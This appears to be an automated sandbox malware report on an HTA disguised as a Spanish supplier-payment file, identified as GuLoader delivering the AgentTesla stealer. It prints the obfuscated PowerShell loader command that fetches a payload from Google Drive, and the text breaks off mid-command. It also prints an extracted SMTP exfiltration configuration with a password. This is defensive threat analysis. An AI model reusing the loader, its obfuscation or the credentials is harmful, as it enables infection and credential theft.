Windows Analysis Report
Gesti#U00f3n Pago a Proveedores - Liquidaci#U00f3n anticipo.hta

Overview

General Information

Sample name: Gesti#U00f3n Pago a Proveedores - Liquidaci#U00f3n anticipo.hta
renamed because original name is a hash value
Original sample name: Gestin Pago a Proveedores - Liquidacin anticipo.hta
Analysis ID: 1430136
MD5: 2902e59a601e8269cd047c9ca8fd83b5
SHA1: 68aff592ebb1ca4ec3bd1a46bad4370d37150fc3
SHA256: 2cfcef680c74b85a3ad26c9bad6052159367c590779836ed188878f4fb68222d
Infos:

Detection

AgentTesla, GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Yara detected AgentTesla
Yara detected GuLoader
Check if machine is in data center or colocation facility
Found suspicious powershell code related to unpacking or dynamic code loading
Hides that the sample has been downloaded from the Internet (zone.identifier)
Installs new ROOT certificates
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: Suspicious MSHTA Child Process
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Very long command line found
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Sigma detected: CurrentVersion Autorun Keys Modification
Stores large binary data to the registry
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer
Yara signature match

Classification

Name Description Attribution Blogpost URLs Link
Agent Tesla, AgentTesla A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla
Name Description Attribution Blogpost URLs Link
CloudEyE, GuLoader CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

AV Detection

barindex
Source: http://pesterbdd.com/images/Pester.png URL Reputation: Label: malware
Source: newfile.exe.4980.10.memstrmin Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Host": "mail.cash4cars.nz", "Username": "logs@cash4cars.nz", "Password": "logs2024!"}
Source: unknown HTTPS traffic detected: 142.250.65.174:443 -> 192.168.2.5:49707 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.251.35.161:443 -> 192.168.2.5:49708 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.250.65.174:443 -> 192.168.2.5:49719 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.251.35.161:443 -> 192.168.2.5:49720 version: TLS 1.2
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbY source: powershell.exe, 00000005.00000002.2389835741.0000000007A0B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ws\System.Core.pdb source: powershell.exe, 00000005.00000002.2389835741.0000000007A0B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Core.pdb source: powershell.exe, 00000005.00000002.2389835741.00000000079F0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Core.pdbk source: powershell.exe, 00000005.00000002.2389835741.00000000079F0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: CallSite.Targetore.pdb source: powershell.exe, 00000005.00000002.2389835741.0000000007A0B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wab.pdbGCTL source: newfile.exe, 0000000A.00000000.2479023272.0000000000C31000.00000020.00000001.01000000.0000000F.sdmp, newfile.exe, 0000000C.00000000.2575308880.0000000000C31000.00000020.00000001.01000000.0000000F.sdmp, newfile.exe.8.dr
Source: Binary string: \??\C:\Windows\symbols\dll\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2396600262.0000000008A3B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wab.pdb source: newfile.exe, newfile.exe, 0000000A.00000000.2479023272.0000000000C31000.00000020.00000001.01000000.0000000F.sdmp, newfile.exe, 0000000C.00000000.2575308880.0000000000C31000.00000020.00000001.01000000.0000000F.sdmp, newfile.exe.8.dr
Source: global traffic TCP traffic: 192.168.2.5:49722 -> 114.142.162.17:26
Source: global traffic HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
Source: Joe Sandbox View IP Address: 208.95.112.1 208.95.112.1
Source: Joe Sandbox View IP Address: 114.142.162.17 114.142.162.17
Source: Joe Sandbox View ASN Name: SERVERMULE-AS-APNimbus2PtyLtdAU SERVERMULE-AS-APNimbus2PtyLtdAU
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: unknown DNS query: name: ip-api.com
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1iLf5bIpysmyGdUsty6cS9uMyDkTZrnvH HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /download?id=1iLf5bIpysmyGdUsty6cS9uMyDkTZrnvH&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1v8In2nCfZQ27ZL002G4s16BbdfpZ-bAh HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /download?id=1v8In2nCfZQ27ZL002G4s16BbdfpZ-bAh&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1iLf5bIpysmyGdUsty6cS9uMyDkTZrnvH HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /download?id=1iLf5bIpysmyGdUsty6cS9uMyDkTZrnvH&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1v8In2nCfZQ27ZL002G4s16BbdfpZ-bAh HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /download?id=1v8In2nCfZQ27ZL002G4s16BbdfpZ-bAh&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
Source: unknown DNS traffic detected: queries for: drive.google.com
Source: svchost.exe, 00000003.00000002.3246360676.0000021BDE200000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.ver)
Source: qmgr.db.3.dr String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
Source: qmgr.db.3.dr String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
Source: qmgr.db.3.dr String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
Source: qmgr.db.3.dr String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
Source: qmgr.db.3.dr String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
Source: qmgr.db.3.dr String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
Source: edb.log.3.dr String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: wab.exe, 00000008.00000002.3260035578.00000000207F1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ip-api.com
Source: wab.exe, 00000008.00000002.3260035578.00000000207F1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ip-api.com/line/?fields=hosting
Source: wab.exe, 00000008.00000002.3260035578.0000000020854000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mail.cash4cars.nz
Source: powershell.exe, 00000001.00000002.2442017954.000000000554A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2385835315.0000000005EFA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000005.00000002.2382419580.0000000004FED000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: wab.exe, 00000008.00000002.3261235261.0000000022941000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000002.3260035578.0000000020854000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000008.00000003.2453618255.0000000022965000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://r3.i.lencr.org/0R
Source: wab.exe, 00000008.00000002.3261235261.0000000022941000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000002.3260035578.0000000020854000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000008.00000003.2453618255.0000000022965000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://r3.o.lencr.org0
Source: powershell.exe, 00000001.00000002.2427094918.00000000044E6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2382419580.0000000004E91000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000008.00000002.3260035578.00000000207F1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000005.00000002.2382419580.0000000004FED000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000001.00000002.2448479212.0000000006EAF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.microsoft.co
Source: wab.exe, 00000008.00000002.3261235261.0000000022941000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000002.3260035578.0000000020854000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000008.00000002.3245859914.0000000004C57000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000003.2453618255.0000000022965000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://x1.c.lencr.org/0
Source: wab.exe, 00000008.00000002.3261235261.0000000022941000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000002.3260035578.0000000020854000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000008.00000002.3245859914.0000000004C57000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000003.2453618255.0000000022965000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://x1.i.lencr.org/0
Source: powershell.exe, 00000001.00000002.2427094918.00000000044E6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2382419580.0000000004E91000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore6lB
Source: powershell.exe, 00000001.00000002.2427094918.0000000004807000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000008.00000003.2368769427.0000000004CC4000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000003.2368875236.0000000004CC4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://apis.google.com
Source: powershell.exe, 00000005.00000002.2385835315.0000000005EFA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000005.00000002.2385835315.0000000005EFA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000005.00000002.2385835315.0000000005EFA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000001.00000002.2427094918.000000000463D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com
Source: wab.exe, 00000008.00000002.3245859914.0000000004C57000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/
Source: wab.exe, 00000008.00000002.3245859914.0000000004C57000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com//ApU3
Source: powershell.exe, 00000001.00000002.2427094918.000000000463D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2382419580.0000000004FED000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/uc?export=download&id=1iLf5bIpysmyGdUsty6cS9uMyDkTZrnvHXR
Source: wab.exe, 00000008.00000002.3246491892.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, wab.exe, 00000008.00000002.3245859914.0000000004C91000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/uc?export=download&id=1v8In2nCfZQ27ZL002G4s16BbdfpZ-bAh
Source: wab.exe, 00000008.00000002.3245859914.0000000004C91000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/uc?export=download&id=1v8In2nCfZQ27ZL002G4s16BbdfpZ-bAhou
Source: powershell.exe, 00000001.00000002.2427094918.000000000480C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.usercontent.google.com
Source: wab.exe, 00000008.00000003.2371113623.0000000004CC4000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000003.2381190586.0000000004CBD000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000003.2381233874.0000000004CC1000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000002.3245859914.0000000004CBD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive.usercontent.google.com/
Source: powershell.exe, 00000001.00000002.2427094918.000000000480C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.usercontent.google.com/download?id=1iLf5bIpysmyGdUsty6cS9uMyDkTZrnvH&export=download
Source: wab.exe, 00000008.00000003.2368769427.0000000004CC4000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000002.3245859914.0000000004CAD000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000003.2371113623.0000000004CC4000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000003.2368875236.0000000004CC4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive.usercontent.google.com/download?id=1v8In2nCfZQ27ZL002G4s16BbdfpZ-bAh&export=download
Source: wab.exe, 00000008.00000003.2371113623.0000000004CC4000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000003.2381190586.0000000004CBD000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000003.2381233874.0000000004CC1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive.usercontent.google.com/y
Source: edb.log.3.dr String found in binary or memory: https://g.live.com/odclientsettings/Prod/C:
Source: svchost.exe, 00000003.00000003.2021884411.0000021BDE010000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.3.dr, edb.log.3.dr String found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
Source: powershell.exe, 00000005.00000002.2382419580.0000000004FED000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000001.00000002.2427094918.0000000004CC9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://go.micro
Source: powershell.exe, 00000001.00000002.2442017954.000000000554A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2385835315.0000000005EFA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: qmgr.db.3.dr String found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe/C:
Source: powershell.exe, 00000001.00000002.2427094918.0000000004807000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000008.00000003.2368769427.0000000004CC4000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000003.2368875236.0000000004CC4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ssl.gstatic.com
Source: powershell.exe, 00000001.00000002.2427094918.0000000004807000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000008.00000003.2368769427.0000000004CC4000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000003.2368875236.0000000004CC4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google-analytics.com;report-uri
Source: powershell.exe, 00000001.00000002.2427094918.0000000004807000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000008.00000003.2368769427.0000000004CC4000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000003.2368875236.0000000004CC4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com
Source: powershell.exe, 00000001.00000002.2427094918.0000000004807000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000008.00000003.2368769427.0000000004CC4000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000003.2368875236.0000000004CC4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.googletagmanager.com
Source: powershell.exe, 00000001.00000002.2427094918.0000000004807000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000008.00000003.2368769427.0000000004CC4000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000003.2368875236.0000000004CC4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.com
Source: unknown Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown HTTPS traffic detected: 142.250.65.174:443 -> 192.168.2.5:49707 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.251.35.161:443 -> 192.168.2.5:49708 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.250.65.174:443 -> 192.168.2.5:49719 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.251.35.161:443 -> 192.168.2.5:49720 version: TLS 1.2

System Summary

barindex
Source: amsi32_736.amsi.csv, type: OTHER Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: amsi32_6664.amsi.csv, type: OTHER Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 736, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 6664, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: C:\Windows\SysWOW64\mshta.exe Process created: Commandline size = 7520
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: Commandline size = 7520
Source: C:\Windows\SysWOW64\mshta.exe Process created: Commandline size = 7520 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: Commandline size = 7520 Jump to behavior
Source: C:\Windows\System32\svchost.exe File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_02930FA1 1_2_02930FA1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_0293106A 1_2_0293106A
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 8_2_029EB4D8 8_2_029EB4D8
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 8_2_029E4AD8 8_2_029E4AD8
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 8_2_029E3EC0 8_2_029E3EC0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 8_2_029EEF18 8_2_029EEF18
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 8_2_029E4208 8_2_029E4208
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe Code function: 10_2_00C31C5C 10_2_00C31C5C
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe Code function: 10_2_00C325D3 10_2_00C325D3
Source: C:\Windows\SysWOW64\mshta.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE Jump to behavior
Source: amsi32_736.amsi.csv, type: OTHER Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: amsi32_6664.amsi.csv, type: OTHER Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 736, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 6664, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: classification engine Classification label: mal100.troj.spyw.evad.winHTA@16/12@4/5
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Lactoscope.cla Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3480:120:WilError_03
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dzjwkmwf.lle.ps1 Jump to behavior
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe Command line argument: WABOpen 10_2_00C31C5C
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=736
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=6664
Source: C:\Program Files (x86)\Windows Mail\wab.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Program Files (x86)\Windows Mail\wab.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\SysWOW64\mshta.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
Source: unknown Process created: C:\Windows\SysWOW64\mshta.exe mshta.exe "C:\Users\user\Desktop\Gesti#U00f3n Pago a Proveedores - Liquidaci#U00f3n anticipo.hta"
Source: C:\Windows\SysWOW64\mshta.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Nasolacrimal = 1;$Crummies182='Substrin';$Crummies182+='g';Function Nejsigerens($Paynize){$Respirator=$Paynize.Length-$Nasolacrimal;For($bolsjes=5; $bolsjes -lt $Respirator; $bolsjes+=(6)){$Velmagtstid+=$Paynize.$Crummies182.Invoke($bolsjes, $Nasolacrimal);}$Velmagtstid;}function Vinddrejning($Brinken){. ($Findelings) ($Brinken);}$Sedimentet=Nejsigerens ',hoppMSil.no SkakzSlleriAkkorlHeterlSyncha.ylte/Gardi5 Ympe.Smlst0 Nei Fabel(RomanWSeed.iBed nnPost.dTilhyoTj.new tirrsMod.g PartNaadseTPaali Haf,a1Indru0P,gme.Prjud0 o,ni;Glamo NonpaWBromii SlaunAstra6P.ene4Desmo;Chous gitax T,ne6Angst4Engin;Calyp SubdorLavniv Farv:Nyrel1Rival2Tempo1Faste.Senge0Reo.t)Skamf TricG P oteunl,ccGr ymkGlo eo aute/ .ata2Ca er0thuj 1S.erl0 Beds0Betin1Tete,0Rearr1Typis OstraFsaginiR,ndsrChrone RetsfB,natoI scux B.nd/Bogti1Alter2 A,lu1Svell.,avpr0Brode ';$Accouplement=Nejsigerens 'CrotoUtravasNebuleRetslrPe ta-VinylA,oblegOpstieNonbinKokketOvers ';$Chorioretinal=Nejsigerens ' Top,hGuaratSoliftXosavpBen is flyv:Podni/Jer s/cl padwolfgr K.miiAfglavgreeneBev,l. ScabgPrea oMicroo irayg PyrolHa,moe,ista.HighecHund.oscro,mSpir./MachiuMydricEvenn?Rain.eParcax ,edipgrumboPro,rrNgleftCh,ly= CottdHuntso Eftew TilbnFeutelHom,woPositaLoquadCarac&Plag iEpicudFoste=Possi1 UndeiXenylLSjklefBeman5MyelobRegioI Y gipDefalyKonges Rackm Ef eyBlrehGGemmadKompaUNo,nysUnseet SiakyUan,d6defauc,ueriSErgat9NonfouMe ioMTeatey.ogstD,atklkAlu,aTDecelZ OzelrMirabnsnuffvcongeH opsk ';$Roselil=Nejsigerens 'Forle>Geoge ';$Findelings=Nejsigerens ' Polli SvineFor,lxKoron ';$Forslvende='Tarnishable';Vinddrejning (Nejsigerens 'Vrd.pSPhilaeByr.ttRe to-DigesCStilloTgtgenErholtDoddieWindln,andotSu.er tirz-Pol,lP un ea BegrtredirhYderz SubmaT.oral: omer\at.enT MyceeTryllrNyanjzUs nse Fungt EpidtObligoTrykf.R.flhtSt.afxF.agttConce itr-LuskeVRakkeaWrybilS.eenuAfgife Jell Gunya$ Go,aFMegavoAutomrAtropsSulfolClotsvW.ttieCraninHyperdPolyreAf gt;Rorpi ');Vinddrejning (Nejsigerens 'Udb ki Gennf Medi hefti(TeksttRetypeKni.ssWolfetS lfi-MicropId,liaForbrtpsychhMilea C.onTo,tol:Valut\ErhveTCityee MaizrU.uelzLovfoe Ph etHandetbaksnoSavor.VisiotTessax supetLuf,v)kalci{Hermge OmkoxF rniiPhrentDisk }Discu;Uhums ');$gedde = Nejsigerens 